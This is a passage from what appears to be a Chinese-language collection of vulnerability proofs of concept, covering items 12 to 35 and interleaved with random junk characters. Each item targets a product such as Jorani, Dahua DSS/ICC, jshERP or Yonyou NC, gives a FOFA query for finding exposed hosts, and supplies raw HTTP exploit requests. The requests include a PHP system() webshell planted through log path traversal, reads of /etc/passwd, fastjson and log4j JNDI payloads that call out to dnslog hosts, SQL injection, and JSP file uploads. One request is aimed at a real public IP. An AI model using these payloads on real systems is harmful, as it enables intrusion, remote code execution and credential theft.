9 [% a1 `) S9 m; U8 c$ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 S/ t% }6 h; A- [8 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* M/ _, d6 q9 A+ {Accept-Encoding: gzip, deflate' x5 N) S+ N: X8 ~' h
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* v8 c# M& T( m# ~2 U; @0 ]/ Z
Connection: close
9 R* @" P% d, y! G6 C( |4 U' E( _. m+ v: Q! ^2 Y
4 ~8 u7 O4 _8 D( p3 I( U" a12. Jorani < 1.0.2 远程命令执行$ W, l& N! _/ R( Z+ s+ R! Q, p
FOFA:title="Jorani"2 U' s. A f7 p1 y0 [, {' e
第一步先拿到cookie
& q4 `3 [5 u0 t4 \1 g' mGET /session/login HTTP/1.1
) c! d# y n3 i) j* ?2 [5 yHost: 192.168.190.30- Q0 a' g7 M. T; }* v3 F! s" J
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% c) E1 }+ `% O& A) HConnection: close
1 O: l8 U, _7 t2 |5 n3 A; pAccept-Encoding: gzip# I2 n! X# R" b0 ~. R
# E- n' I W4 ~6 o6 T* f+ o
+ o2 W, _& l! _' v9 l
响应中csrf_cookie_jorani用于后续请求
% S% N7 s# `, Y9 lHTTP/1.1 200 OK
, \) c6 `/ {% p! X# U2 _Connection: close* G/ \) z3 w9 J! ^0 K; g
Cache-Control: no-store, no-cache, must-revalidate4 d1 r& C! s# \; q, o3 d1 l
Content-Type: text/html; charset=UTF-85 e, ]+ U* f8 @# f8 }
Date: Tue, 24 Oct 2023 09:34:28 GMT
, W0 ?, E! E' gExpires: Thu, 19 Nov 1981 08:52:00 GMT3 Q& r/ g( q! D8 w
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
; W+ V3 |: {# ~( T! [Pragma: no-cache* W6 p* E" B: y! s4 y2 H: u
Server: Apache/2.4.54 (Debian)
( s/ N/ i7 Q% {' USet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
, K& k6 m& _) _Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
$ V, p0 l. U. V0 V) P) A' a# @Vary: Accept-Encoding9 Y3 ]" k/ B7 T h7 j1 `
+ K0 q) U( q4 W3 n
, z8 A2 ~4 Y2 ^8 aPOST请求,执行函数并进行base64编码& ]% v) y( W/ o" |
POST /session/login HTTP/1.1, e* [* T( A( F
Host: 192.168.190.30( X; c% X# D1 j9 l1 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.367 c M( O% I& l/ e1 z$ b
Connection: close1 v9 n7 Q; b1 W
Content-Length: 252
% V9 [+ U) n- ~/ uContent-Type: application/x-www-form-urlencoded z! ]* p/ W. g- d' O6 L
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ m( D7 I' ~ |% h5 i6 ?* i& ]3 \
Accept-Encoding: gzip' K' _3 P& ^# a" N' O9 |) v4 ]
% c# y c: [& ]! Lcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
6 d8 [3 }& V- o; }7 G, S- \
! q$ R, m' d3 A
& R- ?1 }" W W0 a, F2 Z: s/ w
8 i7 U# m) E* x* x+ N4 [. a向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
' j$ q4 ~3 `( W7 p. G6 |GET /pages/view/log-2023-10-24 HTTP/1.1' M, N: E7 a2 F$ X; T
Host: 192.168.190.30
) Y$ z' Y/ i- a$ R% |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, @9 m3 X R# S3 X
Connection: close
! w- m/ b) H+ _0 qCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r9 W6 c0 Y' H% t/ H0 S
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
( r5 E" x/ H- I5 X$ a! w+ IX-REQUESTED-WITH: XMLHttpRequest
8 n# B' k& ] Q! KAccept-Encoding: gzip8 n, t2 }, Z: }4 P0 ^3 t& {
* f2 h+ X/ n* w& @* K
, Q I& q5 m9 n; j3 r( ^/ L13. 红帆iOffice ioFileDown任意文件读取
2 F+ x7 U" a1 b$ s, C. SFOFA:app="红帆-ioffice"6 m5 z5 G. \! f% |3 P# @/ K2 B
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1 ?4 Y4 `6 j0 A! U% q+ s
Host: x.x.x.x
# \# Y2 _+ K3 D/ ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 e9 @' o7 t3 }2 \) a) K
Connection: close1 K& B) h) L6 C# d- e
Accept: */*. K3 N' q+ c, G, w: y% ?, n
Accept-Encoding: gzip
" w0 q" L, W2 W4 k* A
; v& G& M5 f; E. Y" s, B- k) j
, v" N( K" G5 m2 z14. 华夏ERP(jshERP)敏感信息泄露
* y" I5 t" r6 P% ?! O' |( DFOFA:body="jshERP-boot"' k; [, I$ b6 _; d/ ]- X" l, K/ m; K
泄露内容包括用户名密码
6 |6 c. e0 q; A/ F2 c/ ]# D. pGET /jshERP-boot/user/getAllList;.ico HTTP/1.11 @% w% z7 ^0 W
Host: x.x.x.x
: l* N; o$ G. ?- qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
! X& p) _7 J; N% M( |Connection: close' M7 F4 }' J; j$ K4 Z/ L# l
Accept: */*6 n( V. p& d/ s: L8 b1 d' p* Q0 W4 Q
Accept-Language: en5 s! b3 r3 Y$ [( P
Accept-Encoding: gzip6 r" l0 [& K/ M1 U7 _. j- W
& C' ?! B0 ?: B! O* a& L# `9 X Y' j: |4 Q+ F' f2 H3 G
15. 华夏ERP getAllList信息泄露% @/ v( [# r( n# j
CVE-2024-04906 l' G4 d" y+ U- R( }, U7 G- i
FOFA:body="jshERP-boot"8 u* A" C1 z# g E9 [
泄露内容包括用户名密码
7 u0 N* m U, D, m6 gGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.12 E6 R: z0 @2 Q p) k! y% I
Host: 192.168.40.130:100
6 Q2 J- ?6 B K7 _4 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
' J% j. J" h6 l J- F6 S: nConnection: close' J% b+ i. w$ z6 I
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8) o) _. k. ]9 B5 \8 W
Accept-Language: en
; }7 p3 t% I. w0 H9 }5 [# osec-ch-ua-platform: Windows
' b. j$ \) ?4 j$ O, l, A% E! a- MAccept-Encoding: gzip
$ n2 \" I: a) k6 r7 F4 s( J0 l7 c/ _* b- |! J$ Z
' X5 D- e ]6 U0 d I) b
16. 红帆HFOffice医微云SQL注入
" b% X& J- l4 }FOFA:title="HFOffice"
* N- j+ }" {" u5 T L2 Hpoc中调用函数计算1234的md5值
9 t- \* s* x EGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
* {/ G5 G% F7 n$ y# jHost: x.x.x.x
( L* O: F ~& ?, Y9 [8 O6 u+ HUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
9 B7 d* `+ v& v- I* \7 cConnection: close
6 Y# q4 Y$ g0 D1 c' |5 t* |8 wAccept: */*
' @1 b7 D# ]5 c) U7 kAccept-Language: en
4 |& ~& X+ o @9 h: }Accept-Encoding: gzip
* J$ |% ` ~0 T0 l( O6 r' d# N
3 H8 b, @! i# F$ Y3 `, H# Q3 y( b L' J
17. 大华 DSS itcBulletin SQL 注入0 U1 p7 @0 R' w
FOFA:app="dahua-DSS"" ]2 {- X$ B6 C. s, ^9 L
POST /portal/services/itcBulletin?wsdl HTTP/1.1, D( F, J! M/ p& p H& I. o: k
Host: x.x.x.x
9 {. s% A: C' O* GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 F7 e2 ?) v- [7 _5 V5 w6 _4 q; T
Connection: close. @% @+ {: j, z7 i# C7 `
Content-Length: 345
. L" L5 Y* V S% r. K9 u4 E6 RAccept-Encoding: gzip: r4 `3 V' ~( O: s
5 m1 b& g/ n1 `6 ^# E+ \; C$ z2 o
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
$ J r% Q* P+ q, G<s11:Body>/ f; r$ f! c" [. o8 z1 Z
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>6 L. h* O$ ]5 T, q
<netMarkings>- t2 ]' R; i) j8 v2 m3 J
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1" M# L5 P4 i( b1 O5 n
</netMarkings>% p. P. G' D( @% I! \$ G! S, q2 b
</ns1:deleteBulletin>
+ o* l ` v7 [/ \ </s11:Body>
! C O# S- l- l4 T! I Q</s11:Envelope>) f# Y4 x( y* H
9 `, w; s7 X* v
& _3 {+ h; _/ @0 R18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
. w. {. m& w) b" dFOFA:app="dahua-DSS"
/ j4 c' B q8 S" sGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
& m* J+ h# z( ^2 e( t4 D- sHost: your-ip
) q7 u; F1 z) k/ K! {1 |& uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! m% i7 l1 q! {Accept-Encoding: gzip, deflate
: @: f" [( N t/ m7 }9 nAccept: */*
* [1 A" B% G2 t+ s: @Connection: keep-alive9 v) I9 m4 @2 I; Y1 Q' N# \
$ A C7 b/ |. ]! G. Q1 l$ y5 O
6 Q9 p, K* p' M/ B& e" h6 J4 v9 I) k3 X+ |+ u' ]4 `: F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* |" P7 H5 J% {3 t- m4 eFOFA:app="dahua-DSS"
i+ U. x0 N, ]GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
: H8 d t+ A/ D; z2 ]Host:
% m3 S. a* S" H* \User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 G; Z6 @7 P% a& M- {* |Accept-Encoding: gzip, deflate+ _0 X; o1 L8 |1 E# \: v
Accept: */*1 [& G2 m3 @2 U( z5 Y0 S1 F
Connection: keep-alive
2 r, Q0 e( I. @1 U
# o( t0 w" L, Z# I9 |; f+ [4 s% J' x8 c9 c4 `9 [* M9 L0 z: j
20. 大华ICC智能物联综合管理平台任意文件读取
/ C3 j. |! s: f) C! z% h. JFOFA:body="*客户端会小于800*"5 P4 W! z9 R. J; u
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
. B& [% H3 v3 m7 J: U' \2 @9 U6 bHost: x.x.x.x
/ `1 A5 X3 a" K) C9 @User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: ~+ z+ h. l& O: H' p+ s# G i9 aConnection: close2 z, }( f+ [: d& T& i
Accept: */*9 ?# d" z& b7 {) o
Accept-Language: en4 F' ], I* ^1 R0 i2 S) E
Accept-Encoding: gzip, n U, I ~( Y
& t) ?* K! o- x4 G, B
2 i# M4 `- \8 c8 t5 W21. 大华ICC智能物联综合管理平台random远程代码执行& a7 K9 N/ `/ z' U) o0 |
FOFA:icon_hash="-1935899595"
: K# M h* @: G2 u1 ^: A7 u$ O, q% ~POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.18 c1 n8 Z% n5 y5 N7 Q
Host: x.x.x.x
5 P! m0 O2 ?6 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 T. Y0 g' P) s' C
Content-Length: 161
! a/ i# H6 W+ ]% g( a" u6 AAccept-Encoding: gzip) i$ \; p( ?9 o
Connection: close
* }+ ~" w$ l- l2 NContent-Type: application/json;charset=utf-8! w$ ], @- x+ L5 y
- {) n: l7 I+ G. U7 ?( C{- F# W0 ~; o' w6 M% P
"a":{0 d! ?5 j# [3 |+ m8 w
"@type":"com.alibaba.fastjson.JSONObject",
6 P5 j" N! N" O6 c- ?$ ~ {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
7 J5 i$ T$ t& w' v0 v }"": z* ?8 n& h; \" B z9 j" b
}
. e/ X5 ^1 r8 `# x8 q6 d: R4 v# f6 m, I. E1 a5 d
3 ^4 ?- W0 G# Y( v3 x7 T4 _
22. 大华ICC智能物联综合管理平台 log4j远程代码执行' x5 d& c( I1 k* {
FOFA:icon_hash="-1935899595"
, M7 b7 @4 [2 F2 S6 j6 sPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
4 n) S; P. ]9 EHost: your-ip1 U1 D4 w4 o, Y* C7 u/ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
S' l6 S# j9 X& C- a. }Content-Type: application/json;charset=utf-8- a3 `% }* f2 e$ W; X, J
. P& Z! f4 L1 u- S3 [
{
+ ], `& B7 B) }' b. e' i"loginName":"${jndi:ldap://dnslog}"( A. Z9 M2 f% @! }/ |7 r
}
5 g# ^, k8 U8 X; T" Z; q. i: t( L
, f0 O$ B8 \' U7 p0 G
8 s- G8 |9 W2 V0 U' p; d+ P) |$ `: J* N' w: m. o
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 d Q- Q0 f* F" c
FOFA:icon_hash="-1935899595"; r. ? J! `7 x ?9 F
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1. v' q. ^( a+ U2 y, Y9 z
Host: your-ip
$ `9 u* {$ C9 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 {. G9 d- g. B: ~+ ^3 k$ pContent-Type: application/json;charset=utf-8
6 ~% F5 t& ~& r6 B0 B" Y! L; a$ xAccept-Encoding: gzip
# F# N0 c8 g! mConnection: close
0 |4 i' q/ A) o& G# F6 T/ V& Z2 q7 ]; K9 B$ c8 P2 [0 X
{
1 X* V, f& U2 v- n "a":{( m+ m! q. g6 X4 w: M# A5 I. V# R
"@type":"com.alibaba.fastjson.JSONObject",' E- h9 [& _+ @6 O& j! j2 u9 x
{"@type":"java.net.URL","val":"http://DNSLOG"}6 w' h2 C4 J c8 s5 j
}""# O9 i/ R& L* |/ i I
}6 m) W. u; D" x/ S' t, F
, [; c+ H' F! k/ D0 q
. M: S5 |) H. e/ I, G7 Q- L
24. 用友NC 6.5 accept.jsp任意文件上传& Q7 {' P' ?7 _, a* p0 Y
FOFA:icon_hash="1085941792"
/ G7 `1 G$ R. C' H1 EPOST /aim/equipmap/accept.jsp HTTP/1.1
& K3 g6 c( E5 e+ j$ U. y4 p# sHost: x.x.x.x
. w9 \9 P8 b- rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
. r; y7 a$ y9 a. E6 \+ s& IConnection: close4 N+ h; @" C. O" l
Content-Length: 449. P0 L# N' {" y; |' k
Accept: */* L! Y% A9 {- l. H- c' B2 p/ n+ p
Accept-Encoding: gzip
3 B1 s* e* ^4 YContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ z+ ]* M; s k% I2 j
0 X( Y: R `9 M M* `0 d3 p+ D-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 _) U) A* I# V ]3 x9 IContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"9 I; s( ~! l ~5 j r
Content-Type: text/plain T( N0 h7 I: K% P* D) r# |6 T
" J) E0 b; c0 ?/ D, C: q1 h<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
. v' V0 `, a" V) _! ]' t-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
1 k7 E6 }2 @$ y- J9 o5 DContent-Disposition: form-data; name="fname"& G' m9 |$ ]" I) @ I' D" z
t% h Z0 F, R- d, d) ^1 L\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp* L$ w2 H8 N3 ^2 z
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
d1 y3 O' x' L+ F* M5 J, h' T! [/ b3 U1 [
. x5 N" _/ I5 t0 L25. 用友NC registerServlet JNDI 远程代码执行
- ^9 Z. U4 ~! _( HFOFA:app="用友-UFIDA-NC") r1 [( b! F6 \' F
POST /portal/registerServlet HTTP/1.1( H' W0 B3 J V) {: t- H
Host: your-ip/ d$ w1 ]0 A& |' r4 K! A6 { x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
1 \" c3 s6 b5 \8 F5 C. CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9+ c0 y/ B4 w* q- W
Accept-Encoding: gzip, deflate
+ O, f% g5 C l' [3 S3 [Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6; J' S: V H# e! P
Content-Type: application/x-www-form-urlencoded. G7 }! M6 o9 G- @9 b7 S
( v0 e/ J6 @+ _! [& A; p( ttype=1&dsname=ldap://dnslog% F& j! G2 {% _8 j
, L% q# S. h6 x' X+ B' }
0 \1 W, V' i8 @- a2 C: I
1 R7 O7 G0 M* ?, r( ^ x
26. 用友NC linkVoucher SQL注入! S, c- |5 a. K; |
FOFA:app="用友-UFIDA-NC"
4 N. F+ z! `/ m5 @GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 |- Z% K1 [4 h: e/ J- t/ ?Host: your-ip
3 \8 j% f2 V6 t* S! V6 u1 ~ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Z/ t5 H1 m# a- E: n' vContent-Type: application/x-www-form-urlencoded
! B* u' Q- L, u+ _) p% b U3 }Accept-Encoding: gzip, deflate
0 t5 W2 {! I- n f6 M+ eAccept: */*
$ F0 S8 ~8 \2 O2 NConnection: keep-alive
- F! @1 u% D( O" P
, O4 j5 u7 R% j, k3 }, O
8 n( L9 g+ y5 C8 T4 ^5 i& L27. 用友 NC showcontent SQL注入5 [6 d$ a% {# _3 W7 g0 d' `
FOFA:icon_hash="1085941792"; U0 n2 l. V. r! f, r! J- Z6 v3 d
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
+ c. P+ W9 m: U; c) [Host: your-ip* p A! x! i* V& F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 G+ _; v( {7 V9 b9 D4 uAccept-Encoding: identity4 m4 [3 i& T( e1 T
Connection: close6 l, d9 m, U, e8 X: _; `: ^) E% M( x
Content-Type: text/xml; charset=utf-8 H; q7 \+ I/ A+ g
( |- `; X8 S( o6 s6 W5 d5 D
. o, L* [5 ]9 j8 ]3 X1 _28. 用友NC grouptemplet 任意文件上传$ b$ c8 W- V0 F+ X" l& V; ]5 U, w4 N
FOFA:icon_hash="1085941792"+ ]7 Y" W. |- v8 @
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1+ h' I/ i) J3 Y2 o
Host: x.x.x.x
& ^, U, l3 Y0 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36) ]5 Q4 T& S6 w% c5 o
Connection: close* z+ }( T9 N7 R- L: h& k( T
Content-Length: 268
$ q3 F6 S9 U7 j. [2 WContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk' n& ~2 I3 x) m6 i# Q4 L: \9 k& Q/ p
Accept-Encoding: gzip1 |, ~9 s1 N* ?
; Y( ]- w4 L+ l/ a: J5 o
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
9 B" y( x! u& f) |' L( j& K& BContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"2 C( H+ \# s0 t8 ~* V
Content-Type: application/octet-stream
; G) N0 ?5 [6 n3 W0 h
# j% F- w* }$ S. i<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>8 G6 b5 f- v+ F% ~+ s E
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--+ i7 }5 J6 N$ e6 Y
' D8 Y# n2 O9 M
% m0 w" j8 \1 U1 [3 H7 S/uapim/static/pages/nc/head.jsp* ^6 V( O) W# q! ?8 ~
! r* I# g8 i, y" s7 C n29. 用友NC down/bill SQL注入
/ d1 M* ]- l; i# f! y/ HFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 y, {3 L* Q( A7 w9 AGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
2 p+ Z! j3 ?& u" z r% d5 iHost: your-ip+ e8 H5 W! O+ `) G' h5 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ m% t" s6 k( x
Content-Type: application/x-www-form-urlencoded. N6 H1 T0 t/ o
Accept-Encoding: gzip, deflate* ?2 | O& m; J3 T
Accept: */*
! Q. E6 a s& f) y$ O$ aConnection: keep-alive, F5 Q) V$ s8 w
, Z p1 g1 [ Z
0 V" G% r1 @; Y, t* g30. 用友NC importPml SQL注入
- s- F I1 g U8 V( z- nFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; a/ n3 F* o' r) qPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
' T2 A' f' q9 b# L" _1 l _Host: your-ip( {6 c% K( I/ f, s. E& m1 ]1 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
; ^8 H. n& N% m+ i, U+ p0 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 @) H. L7 y' u; ^0 q& @% B1 qConnection: close
0 O' ]: F! S. W: l2 K+ Q5 o) T. a' b" {% Y, z- Z$ y
------WebKitFormBoundaryH970hbttBhoCyj9V
6 @: V7 u2 v' ?Content-Disposition: form-data; name="Filedata"; filename="1.jpg"2 ]) q2 L, f- [4 U1 l
Content-Type: image/jpeg
# I, l9 s5 E8 j0 [5 `------WebKitFormBoundaryH970hbttBhoCyj9V--, M2 X$ {& U) Y, N. v
$ O" Q! f" v" x5 \# `
. i1 `: e( Z2 m: ^0 P31. 用友NC runStateServlet SQL注入8 f7 {: ]/ L/ A# }$ p" q! C
version<=6.58 k3 z- V) c! G) h, U x
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
+ m) o% C& u, I2 U) K/ m0 |$ @ pGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 r* Z A& ^0 SHost: host
o' t& e6 T7 t& v2 U' EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
2 Z& t* [# Q. ]/ wContent-Type: application/x-www-form-urlencoded! ]. N) ~, H% r
' X& J a" w4 ]9 i
1 k0 D! `; }8 V0 `/ X5 N1 T32. 用友NC complainbilldetail SQL注入
" r" E6 y# q5 g: \5 Y) B6 F5 xversion= NC633、NC65' v3 Y. A! p |# s' `+ G
FOFA:app="用友-UFIDA-NC" {& a& w# z: J
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: _9 @$ e( W, C& gHost: your-ip3 o3 d0 t; i2 U& C9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* v0 G# r# E) W7 z* R6 [0 s. hContent-Type: application/x-www-form-urlencoded
* F5 v8 J+ f' j4 z$ F! Z' _Accept-Encoding: gzip, deflate% Q7 m4 u& T0 F5 {) _* e# B1 N# z
Accept: */*" S/ D: t; O9 M4 D+ C9 o. ]
Connection: keep-alive
I$ ?: R8 E3 D/ @. |
+ r0 U% J0 W+ P7 _0 {2 Z& ? `7 ~1 l$ s& Q
33. 用友NC downTax/download SQL注入
2 h5 D) J! N( z' Y9 q gversion:NC6.5FOFA:app="用友-UFIDA-NC"
3 a, ^" w! \* y$ J$ \+ `6 lGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. j+ K1 @3 i; U% |) v0 GHost: your-ip
1 J! E) t1 Z, X3 z9 L) ^2 D5 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- M7 ?" t- d6 e5 G) N4 j( n
Content-Type: application/x-www-form-urlencoded/ d5 V& z1 [* d3 j8 \
Accept-Encoding: gzip, deflate
* u* _4 c) }3 r( _: I6 S3 vAccept: */*
4 p X2 J: e- wConnection: keep-alive+ y L- W* e3 i! V; q
9 z3 G+ y# O* v- m& f
/ Y& X+ F7 ?$ i3 {& G3 i34. 用友NC warningDetailInfo接口SQL注入
9 k7 [. R+ {! E# B a9 {( \ ?4 YFOFA:app="用友-UFIDA-NC", E9 e" N; _* c
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1. q' j3 c+ w/ x9 H3 b
Host: your-ip
, u( W# P5 G" s6 y3 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! s; C2 g9 Y2 V% e# h& Y
Content-Type: application/x-www-form-urlencoded
6 R |3 v- M$ jAccept-Encoding: gzip, deflate
: ^) O* ]& D, v2 ]/ | z& m' l# @Accept: */*
/ D1 R# ]! A& d5 [$ B( N, i+ KConnection: keep-alive
0 Q5 r6 [# W+ P7 X0 c* I5 U
0 x9 [8 @& w# \: C2 O+ R$ ?: r/ w& o! `' M2 ]0 o
35. 用友NC-Cloud importhttpscer任意文件上传5 }0 ]3 ~# H8 C) Y* i
FOFA:app="用友-NC-Cloud"5 `+ @) A) p& T# C* P/ y* {
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
6 h+ Z. u6 u$ m2 T, _Host: 203.25.218.166:88883 O- C; M! \8 ?, S5 `
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 A( g$ n4 `- e5 @! ?: [
Accept-Encoding: gzip, deflate9 V! Q: s+ U- _3 t' X2 M1 A4 C
Accept: */*
$ p/ s4 G+ z) e# hConnection: close; W. h* e; H' @2 ]+ D) \( P" C
